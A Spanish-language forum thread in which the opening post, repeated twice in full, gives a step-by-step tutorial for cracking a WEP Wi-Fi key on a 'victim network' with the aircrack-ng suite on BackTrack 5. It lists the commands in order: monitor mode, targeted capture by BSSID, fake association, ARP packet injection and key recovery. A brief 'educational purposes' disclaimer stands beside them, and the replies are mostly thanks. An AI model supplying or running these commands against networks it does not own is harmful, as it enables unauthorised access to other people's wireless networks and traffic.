como hackear una red wifi con backtrack r1
+5
josue24
ica
Fr4n15
gabrielvalle
luisxpi219
9 participantes
Página 1 de 1.
como hackear una red wifi con backtrack r1
Qué Onda Compas de iMaster¡ Aqui otra vez con un Tutorial para hacer auditoría de Redes inalámbricas con cifrado wep en 5 minutos más o menos; usando Backtrack 5 R1 Gnome.
"Este Post es con Fines Educativos y/o Didácticos, No me Hago Responsable del Uso Malicioso"
Bueno cómo dice el Pollo: "Vamos al Grano"
*Lo Primero es saber el nombre de nuestra interface (Targeta Wireless) para ponerla en Modo Monitor, para esto abrimos una Terminal y escribimos lo siguiente:
airmon-ng
Y nos aparecerá el nombre de nuestra interfaz, el chipset y el driver en mi caso es una el nombre de la interfaz es Wlan0
1* Ya qué conocemos el nombre de nuestra interfaz procedemos a ponerla en Modo Monitor y escribimos lo siguiente:
airmon-ng start wlan0
Ya tenemos nuestra targeta en Modo Monitor (monitor mode enabled on mon0) y como se podrán dar cuenta "mon0" es el nombre de la interfaz en modo monitor.
2* Ahora vamos a escanear redes disponibles con el siguiente comando:
airodump-ng mon0
y con esto comenzará a mostrarnos las Redes Disponibles. Para seleccionar la Red Víctima tenemos qué detener el escaneo presionando ctrl+c
3* En este paso vamos a Capturar la Red Víctima para esto escribimos el siguiente comando:
airodump-ng -w redes -c 11 --bssid 00:22:A4:30E:59 mon0
donde
-w = especifica el nombre del archivo donde se guarda la captura de datos
-c = especifica el canal de la Red
--bssid = especifica Mac de Punto de Acceso
mon0 = especifica la interfaz de la targeta de Red en Modo Monitor
4* Abrimos una segunda Terminal (sin cerrar la primera) y escribimos lo siguiente:
aireplay-ng -1 0 -a 00:22:A4:30E:59 mon0
esto es para Asociar su pc con la Red Víctima
5* Ahora si viene lo bueno, a inyectar paquetes a la red, para esto tecleamos lo siguiente:
aireplay-ng -3 -b 00:22:A4:30E:59 mon0
con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la columna #Data se incrementará rapidamente, y esperamos a que llegue a los 30,000 datos para poder desemcriptar la Clave
6* Cuando llegue a los 30,000 datos abrimos una tercera y última Terminal y escribimos el famoso comando:
aircrack-ng redes-01.cap
redes = archivo donde se guarda la captura (.cap) el mismo qué mencionamos en el paso 3*
damos enter y empezará a decifrar a la clave y Vualá Clave desemcriptada
Key Found¡ (09:86:23:47:63)
Y en dado caso de qué no entiendan ni un carajo¡ ahi les dejo un Video para qué vean de que Lado masca La Iguana.
link: [Tienes que estar registrado y conectado para ver este vínculo]
Eso es todo por esta vez, ya saben si les Gustó el Post comenten, agréguenlo a Favoritos, siganme los buenos y no me caerían mal unos Puntos
Viva Nicaragua, Viva Backtrack y Viva el Software Libre
Ya saben compas¡ si tienen dudas sobre auditoria de redes, no duden en echarme un grito por mensaje privado.
¡Suerte, todo depende de ustedes!
"Este Post es con Fines Educativos y/o Didácticos, No me Hago Responsable del Uso Malicioso"
Bueno cómo dice el Pollo: "Vamos al Grano"
*Lo Primero es saber el nombre de nuestra interface (Targeta Wireless) para ponerla en Modo Monitor, para esto abrimos una Terminal y escribimos lo siguiente:
airmon-ng
Y nos aparecerá el nombre de nuestra interfaz, el chipset y el driver en mi caso es una el nombre de la interfaz es Wlan0
1* Ya qué conocemos el nombre de nuestra interfaz procedemos a ponerla en Modo Monitor y escribimos lo siguiente:
airmon-ng start wlan0
Ya tenemos nuestra targeta en Modo Monitor (monitor mode enabled on mon0) y como se podrán dar cuenta "mon0" es el nombre de la interfaz en modo monitor.
2* Ahora vamos a escanear redes disponibles con el siguiente comando:
airodump-ng mon0
y con esto comenzará a mostrarnos las Redes Disponibles. Para seleccionar la Red Víctima tenemos qué detener el escaneo presionando ctrl+c
3* En este paso vamos a Capturar la Red Víctima para esto escribimos el siguiente comando:
airodump-ng -w redes -c 11 --bssid 00:22:A4:30E:59 mon0
donde
-w = especifica el nombre del archivo donde se guarda la captura de datos
-c = especifica el canal de la Red
--bssid = especifica Mac de Punto de Acceso
mon0 = especifica la interfaz de la targeta de Red en Modo Monitor
4* Abrimos una segunda Terminal (sin cerrar la primera) y escribimos lo siguiente:
aireplay-ng -1 0 -a 00:22:A4:30E:59 mon0
esto es para Asociar su pc con la Red Víctima
5* Ahora si viene lo bueno, a inyectar paquetes a la red, para esto tecleamos lo siguiente:
aireplay-ng -3 -b 00:22:A4:30E:59 mon0
con esto enviaremos y recibiremos paquetes. Vamos a la primera Terminal y en la columna #Data se incrementará rapidamente, y esperamos a que llegue a los 30,000 datos para poder desemcriptar la Clave
6* Cuando llegue a los 30,000 datos abrimos una tercera y última Terminal y escribimos el famoso comando:
aircrack-ng redes-01.cap
redes = archivo donde se guarda la captura (.cap) el mismo qué mencionamos en el paso 3*
damos enter y empezará a decifrar a la clave y Vualá Clave desemcriptada
Key Found¡ (09:86:23:47:63)
Y en dado caso de qué no entiendan ni un carajo¡ ahi les dejo un Video para qué vean de que Lado masca La Iguana.
link: [Tienes que estar registrado y conectado para ver este vínculo]
Eso es todo por esta vez, ya saben si les Gustó el Post comenten, agréguenlo a Favoritos, siganme los buenos y no me caerían mal unos Puntos
Viva Nicaragua, Viva Backtrack y Viva el Software Libre
Ya saben compas¡ si tienen dudas sobre auditoria de redes, no duden en echarme un grito por mensaje privado.
¡Suerte, todo depende de ustedes!
luisxpi219- Master J2ME
- Pais :
Móvil : Sony Experia Mini 10
Re: como hackear una red wifi con backtrack r1
MUY buen post hermano sigue adelante tienes
gabrielvalle- Copper
- Pais :
que lastima amigo tu post esta bueno pero no lo puedo probar ya que mi compu no me la acepta.
gracias brow te dejo tu merecido +1
josue24- Avanzado
- Pais :
Interesante post compañero
User666- Member VIP
- Pais :
carnal probando hack mi propia red la funcion donde se pasa a monitor con mon0 me da error l hago
nafpac- Master Proxy
- Pais :
Móvil : htc mytouch 4g